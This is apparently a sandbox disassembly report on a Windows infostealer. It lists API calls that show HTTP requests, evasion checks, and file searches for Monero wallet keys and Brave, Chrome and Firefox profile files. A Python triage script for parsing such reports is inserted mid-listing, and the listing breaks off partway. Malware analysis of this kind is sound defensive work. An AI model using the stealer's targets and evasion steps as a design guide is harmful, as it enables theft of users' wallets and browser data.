                                • Part of subcall function 00FF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6335
                                • Part of subcall function 00FF6280: HttpOpenRequestA.WININET(00000000,GET,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF6385
                                • Part of subcall function 00FF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FF63BF
                                • Part of subcall function 00FF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01005228
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: f71305ba7dca5f5aaa6fff82815fb7495a4178f5293d398f48922300adb5e53f
                              • Instruction ID: be956642f3eefec9422a6eb93280587fb6a1b65b0fe68cd824bbe761a437c218
                              • Opcode Fuzzy Hash: f71305ba7dca5f5aaa6fff82815fb7495a4178f5293d398f48922300adb5e53f
                              • Instruction Fuzzy Hash: F0112E30A00209EBEB15FF74DD51EED7338AF60200F408158E94A4B5D1EF74AB09CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 133b105d166e1e6c7021dc4157f07bb46b27277c12c26598f718cca1dc55bd21
                              • Instruction ID: 6332d8f5b5f38eeb7ca629cf0383c3200714e925c07f9f6e9a489be49b9466c4
                              • Opcode Fuzzy Hash: 133b105d166e1e6c7021dc4157f07bb46b27277c12c26598f718cca1dc55bd21
                              • Instruction Fuzzy Hash: 6B0186B1904204EBD710DF99D949BAEBBB8F704B21F104269F5C5E3280C37855048BA1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF1132
                              • ExitProcess.KERNEL32 ref: 00FF1143
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 7e4ddbc9d7485411253c82c00c03b2ecab72a934f8fd49988cca621b80898392
                              • Instruction ID: 97b28d0d4651b60d653c6bdf258d976a830955214d4fa9fcaa8aabc9e5e18714
                              • Opcode Fuzzy Hash: 7e4ddbc9d7485411253c82c00c03b2ecab72a934f8fd49988cca621b80898392
                              • Instruction Fuzzy Hash: 3EE0E67094534CFBE7206BA0EC0EB1D7678AF04B11F104155F709B71C4D6B526409799
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FF10F7
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 8ce154d0520cf518203f497f7a7440c3f33d639bee43a05f8e2f988510c093c5
                              • Instruction ID: 96843f2df78184c9bf798675cf84cd25949a063d8099b428566c626083d6d9a6
                              • Opcode Fuzzy Hash: 8ce154d0520cf518203f497f7a7440c3f33d639bee43a05f8e2f988510c093c5
                              • Instruction Fuzzy Hash: CFF0E271A41208BBE7149AA8AC49FBEB7E8EB05B25F300858F644E3280D5719E00DBA0
                              APIs
                                • Part of subcall function 010078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007910
                                • Part of subcall function 010078E0: RtlAllocateHeap.NTDLL(00000000), ref: 01007917
                                • Part of subcall function 010078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0100792F
                                • Part of subcall function 01007850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                                • Part of subcall function 01007850: RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                                • Part of subcall function 01007850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                              • ExitProcess.KERNEL32 ref: 00FF11C6
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 492d305c61fb3e3f3ee1501e244a74e31a2dfbea1b1a11fdd1524e206dadd264
                              • Instruction ID: dea045d9457159047499d63cb58712cc40283460114ada59487d56b6c6a83cfd
                              • Opcode Fuzzy Hash: 492d305c61fb3e3f3ee1501e244a74e31a2dfbea1b1a11fdd1524e206dadd264
                              • Instruction Fuzzy Hash: 6EE012B5D5030657EA1173B0BC09BAA329C6B25245F140434FA85D3581FA29FA009765
                              APIs
                              • wsprintfA.USER32 ref: 010038CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 010038E3
                              • lstrcat.KERNEL32(?,?), ref: 01003935
                              • StrCmpCA.SHLWAPI(?,01010F70), ref: 01003947
                              • StrCmpCA.SHLWAPI(?,01010F74), ref: 0100395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 01003C67
                              • FindClose.KERNEL32(000000FF), ref: 01003C7C
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0bcaba4711a65c2ba9c7c8078ae86db1464b4aa81942999587f1b6544e1caef7
                              • Instruction ID: 865b0d9273384744c9a4aabc7e369dbe5f9dc0e806c851d5714a07b7c3f52a41
                              • Opcode Fuzzy Hash: 0bcaba4711a65c2ba9c7c8078ae86db1464b4aa81942999587f1b6544e1caef7
                              • Instruction Fuzzy Hash: 3BA13071A002099FDB35DB64DC89FEE7378BB58300F04459CA68D9B185EB759B84CF61
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,01010B32,01010B2B,00000000,?,?,?,010113F4,01010B2A), ref: 00FFBEF5
                              • StrCmpCA.SHLWAPI(?,010113F8), ref: 00FFBF4D
                              • StrCmpCA.SHLWAPI(?,010113FC), ref: 00FFBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00FFC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 8a1313ae208cc03a5d4c621b50d8a7807947976a5d5f0a042a931b49502bfc6c
                              • Instruction ID: b986b683a9889833d809e8fa65ef46fa06c0675df4758e96f6153639bd372c9c
                              • Opcode Fuzzy Hash: 8a1313ae208cc03a5d4c621b50d8a7807947976a5d5f0a042a931b49502bfc6c
                              • Instruction Fuzzy Hash: A6425472A10209EBEB15FB70DD95EED733CAFA4300F408568A54A971D4EF349B49CBA1
                              APIs
                              • wsprintfA.USER32 ref: 0100492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 01004943
                              • StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                              • StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                              • FindClose.KERNEL32(000000FF), ref: 01004B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: fc9c9f28eba5a79f4cd28ad091f198be6027ec1bd250b3b2c44949805b7ff68d
                              • Instruction ID: a19e0117c5a6467e6c5291f9cc7de5a48653dd43449e89503b45514b8b9ecf96
                              • Opcode Fuzzy Hash: fc9c9f28eba5a79f4cd28ad091f198be6027ec1bd250b3b2c44949805b7ff68d
                              • Instruction Fuzzy Hash: D26188B1900219ABDB25EBA4EC49FEA737CBB48700F04459CB689D7044EB75D785CF90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01004580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01004587
                              • wsprintfA.USER32 ref: 010045A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 010045BD
                              • StrCmpCA.SHLWAPI(?,01010FC4), ref: 010045EB
                              • StrCmpCA.SHLWAPI(?,01010FC8), ref: 01004601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0100468B
                              • FindClose.KERNEL32(000000FF), ref: 010046A0
                              • lstrcat.KERNEL32(?,0198FAD8), ref: 010046C5
                              • lstrcat.KERNEL32(?,0198E250), ref: 010046D8
                              • lstrlen.KERNEL32(?), ref: 010046E5
                              • lstrlen.KERNEL32(?), ref: 010046F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: c0ae920899d1db42bd13edfbe319d40ca01cdf077c71b6881c879d814ae02af0
                              • Instruction ID: 568e2c971a3a6accc242b22a0d5ee11f140a36f3f6ff3cba7ab551bdc67da353
                              • Opcode Fuzzy Hash: c0ae920899d1db42bd13edfbe319d40ca01cdf077c71b6881c879d814ae02af0
                              • Instruction Fuzzy Hash: 4C5162B1900218ABDB65EB70EC8DFED737CBB58300F404598E68AD7084EB759B848F91
                              APIs
                              • wsprintfA.USER32 ref: 01003EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 01003EDA
                              • StrCmpCA.SHLWAPI(?,01010FAC), ref: 01003F08
                              • StrCmpCA.SHLWAPI(?,01010FB0), ref: 01003F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0100406C
                              • FindClose.KERNEL32(000000FF), ref: 01004081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 336a7438243b6f5847df180327c971a076038f3535799bf3452cd06f81c4603a
                              • Instruction ID: 8b77e3c4e4cf9e723aa7d6fcdee63cf3077d2334bb0b1ddd00e01e38f3733ddc
                              • Opcode Fuzzy Hash: 336a7438243b6f5847df180327c971a076038f3535799bf3452cd06f81c4603a
                              • Instruction Fuzzy Hash: E85167B1900218ABDB25EBB4DC89EEA737CBB54300F04859CB699D7084DB75D7858F50
                              APIs
                              • wsprintfA.USER32 ref: 00FFED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FFED55
                              • StrCmpCA.SHLWAPI(?,01011538), ref: 00FFEDAB
                              • StrCmpCA.SHLWAPI(?,0101153C), ref: 00FFEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00FFF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 33fb9afe60cee01da021e0ac4212bd2da15942df4e19d7cec8e6d0fd305ec17f
                              • Instruction ID: 0b031d417a133ed215ea3c26ed939dbb1970c5d0095409387083189c3a7eca4f
                              • Opcode Fuzzy Hash: 33fb9afe60cee01da021e0ac4212bd2da15942df4e19d7cec8e6d0fd305ec17f
                              • Instruction Fuzzy Hash: 11E1D272A11219DAFB56FB60DC55EEE7338AF64200F4041A9A54B670D1EF306F8ACF51
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010115B8,01010D96), ref: 00FFF71E
                              • StrCmpCA.SHLWAPI(?,010115BC), ref: 00FFF76F
                              • StrCmpCA.SHLWAPI(?,010115C0), ref: 00FFF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00FFFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1ab98a440018910aaf0ce50f53da212e13bde049524091c66002804fd23eee99
                              • Instruction ID: f51c021c4a73e40c23303aeb57e936cf04f791b52331c2525a653885b5f3cec0
                              • Opcode Fuzzy Hash: 1ab98a440018910aaf0ce50f53da212e13bde049524091c66002804fd23eee99
                              • Instruction Fuzzy Hash: A3B13371A00209DBEB25FF60DC95FEE7379AF64300F4085A8958A97194EF346B49CF91
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0101510C,?,?,?,010151B4,?,?,00000000,?,00000000), ref: 00FF1923
                              • StrCmpCA.SHLWAPI(?,0101525C), ref: 00FF1973
                              • StrCmpCA.SHLWAPI(?,01015304), ref: 00FF1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FF1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00FF1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF1E20
                              • FindClose.KERNEL32(000000FF), ref: 00FF1E32
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: c53798f54046834b87905fa73ca9c8feef32ceef3b56b2b472f50c2863ec3cc5
                              • Instruction ID: 85de402a5d5259f2ac0153dabeb4fc47fdde89d5df418d0395cf814bb94377e4
                              • Opcode Fuzzy Hash: c53798f54046834b87905fa73ca9c8feef32ceef3b56b2b472f50c2863ec3cc5
                              • Instruction Fuzzy Hash: F712D075A10219DBEB56FB60DC94EEE7378AF64300F404199A58A670D0EF746F89CFA0
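The records above all share one shape: wsprintfA builds a search path from a "%s\*.*" style format, FindFirstFileA opens it, two StrCmpCA calls run on each entry, FindNextFileA advances and FindClose ends the loop; the record at 00FF1923 is the one that also calls CopyFileA and DeleteFileA on what the walk finds. The script below is an added example for reading such Joe Sandbox IDA-plugin listings and is not part of the report or of the sample: it parses records copied from this page into call lists, checks the FindFirstFileA/FindNextFileA/FindClose ordering, and tags each function. The tag names are this example's own, and the reading of the two StrCmpCA calls as a "." and ".." skip is an assumption, since the report does not resolve the compared literals.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example, not report code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: two records copied from the listing above, the plain directory walk
# at 010045BD and the walk at 00FF1923 that also copies and deletes what it finds.
SAMPLE = r"""APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01004580
• RtlAllocateHeap.NTDLL(00000000), ref: 01004587
• wsprintfA.USER32 ref: 010045A6
• FindFirstFileA.KERNEL32(?,?), ref: 010045BD
• StrCmpCA.SHLWAPI(?,01010FC4), ref: 010045EB
• StrCmpCA.SHLWAPI(?,01010FC8), ref: 01004601
• FindNextFileA.KERNEL32(000000FF,?), ref: 0100468B
• FindClose.KERNEL32(000000FF), ref: 010046A0
• API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
• String ID: %s\%s$%s\*
• API String ID: 671575355-2848263008
APIs
  • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0101510C,?,?,?,010151B4,?,?,00000000,?,00000000), ref: 00FF1923
• StrCmpCA.SHLWAPI(?,0101525C), ref: 00FF1973
• StrCmpCA.SHLWAPI(?,01015304), ref: 00FF1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FF1D40
• DeleteFileA.KERNEL32(00000000), ref: 00FF1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00FF1E20
• FindClose.KERNEL32(000000FF), ref: 00FF1E32
• API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
• String ID: \*.*
• API String ID: 1415058207-1173974218
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE, optional (args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id"}
EXTRA_TAGS = {"CopyFileA": "copies-files", "DeleteFileA": "deletes-files"}


@dataclass
class Call:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int
    caller: str | None = None  # set for "Part of subcall function X:" lines


@dataclass
class FunctionRecord:
    direct: list[Call] = field(default_factory=list)
    subcalls: list[Call] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Start a record at each 'APIs' header; collect its calls and similarity fields."""
    records: list[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FunctionRecord())
        elif records and (m := CALL_RE.match(line)):
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            call = Call(m["name"], m["module"], args, int(m["ref"], 16), m["caller"])
            (records[-1].subcalls if call.caller else records[-1].direct).append(call)
        elif records and (m := FIELD_RE.match(line)) and m["key"] in FIELDS:
            setattr(records[-1], FIELDS[m["key"]], m["val"])
    return records


def loop_is_well_formed(rec: FunctionRecord) -> bool:
    """FindFirstFileA must precede FindNextFileA, which must precede FindClose."""
    pos = {c.name: c.ref for c in rec.direct}
    needed = ("FindFirstFileA", "FindNextFileA", "FindClose")
    return all(n in pos for n in needed) and pos[needed[0]] < pos[needed[1]] < pos[needed[2]]


def classify(rec: FunctionRecord) -> set[str]:
    """Tag the behaviour visible in the direct-call list (tag names are this example's own)."""
    seq = [c.name for c in rec.direct]  # the report lists calls in address order
    tags = {tag for api, tag in EXTRA_TAGS.items() if api in seq}
    if loop_is_well_formed(rec):
        tags.add("dir-walk")
        first, nxt = seq.index("FindFirstFileA"), seq.index("FindNextFileA")
        # Two StrCmpCA calls per entry before FindNextFileA is the usual "." / ".." skip.
        # Assumption: the report does not resolve the compared literals.
        if seq[first:nxt].count("StrCmpCA") >= 2:
            tags.add("skips-dot-entries")
        # The search pattern is built by wsprintfA or carried as a "\*" format string.
        if "wsprintfA" in seq[:first] or "\\*" in rec.string_id:
            tags.add("builds-wildcard-path")
    return tags


def triage(text: str) -> list[tuple[str, list[str]]]:
    """(address of first direct call, sorted tags) per record, for a fast scan of a report."""
    return [(f"{r.direct[0].ref:08X}", sorted(classify(r))) for r in parse_records(text) if r.direct]
```

Run over the full listing instead of the two embedded records, triage() yields one line per function; filtering on "copies-files" separates the grabber at 00FF1923 from the many plain walkers, and the subcall arguments and String IDs above (\Monero\wallet.keys, Brave and Google Chrome Preferences, prefs.js) name what those walkers are looking for.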
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01010C2E), ref: 00FFDE5E
                              • StrCmpCA.SHLWAPI(?,010114C8), ref: 00FFDEAE
                              • StrCmpCA.SHLWAPI(?,010114CC), ref: 00FFDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00FFE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 963ef409ef9249257a234042504c2c41cc53d9f73510c57ba2b2145c18af6d9a
                              • Instruction ID: 523a2e0a64c42a58af66b765ece01038cebdc2ecf99915dcac718791d781b4e0
                              • Opcode Fuzzy Hash: 963ef409ef9249257a234042504c2c41cc53d9f73510c57ba2b2145c18af6d9a
                              • Instruction Fuzzy Hash: CBF18075A14219DAEB5AEB60DD94EEE7338BF34300F4041DA958A670D0EF346B89CF61
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010114B0,01010C2A), ref: 00FFDAEB
                              • StrCmpCA.SHLWAPI(?,010114B4), ref: 00FFDB33
                              • StrCmpCA.SHLWAPI(?,010114B8), ref: 00FFDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FFDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00FFDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 5111f1c9e07b8de66f1ae491ebca2a42f9055e0fe6198efbe30cf92ceb9078a9
                              • Instruction ID: c0951c58ca9d7222c39c7b6f3941dd8d0e790f6deb46d0ebc07b1967d74a206d
                              • Opcode Fuzzy Hash: 5111f1c9e07b8de66f1ae491ebca2a42f9055e0fe6198efbe30cf92ceb9078a9
                              • Instruction Fuzzy Hash: 4C912472A00209D7DB15FB70EC59EFD737DAFA4300F408568A98A97194EF349B0D9B91
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,010105AF), ref: 01007BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 01007BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 01007C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01007C62
                              • LocalFree.KERNEL32(00000000), ref: 01007D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: e44b0bc819153edc9ea71da33178dc596861b042516fdc9f58d6a5039cb41c2f
                              • Instruction ID: badf8168a4f3360b944052f8533888ae318d2f06be4b117898c7eae3424e6219
                              • Opcode Fuzzy Hash: e44b0bc819153edc9ea71da33178dc596861b042516fdc9f58d6a5039cb41c2f
                              • Instruction Fuzzy Hash: B2412A71A40219EBEB25DB94DC98FEEB7B8FB54700F104199E14AA7180DB342F85CFA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 11^{$27En$Q*:{$c4u$?~$i~z$mw
                              • API String ID: 0-1993698918
                              • Opcode ID: 3e8be39040764fdbdbb4199daf823cbf813554e05f3e1c82ca868719f2674e87
                              • Instruction ID: f38a4d46240040ac4e053d52b42f2fae22d7f6de5f560b087bf467db48fd1ca8
                              • Opcode Fuzzy Hash: 3e8be39040764fdbdbb4199daf823cbf813554e05f3e1c82ca868719f2674e87
                              • Instruction Fuzzy Hash: FEB24AF360C2049FE3046E2DEC8567ABBE6EF94720F1A493DEAC4C7744EA3558058697
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,01010D73), ref: 00FFE4A2
                              • StrCmpCA.SHLWAPI(?,010114F8), ref: 00FFE4F2
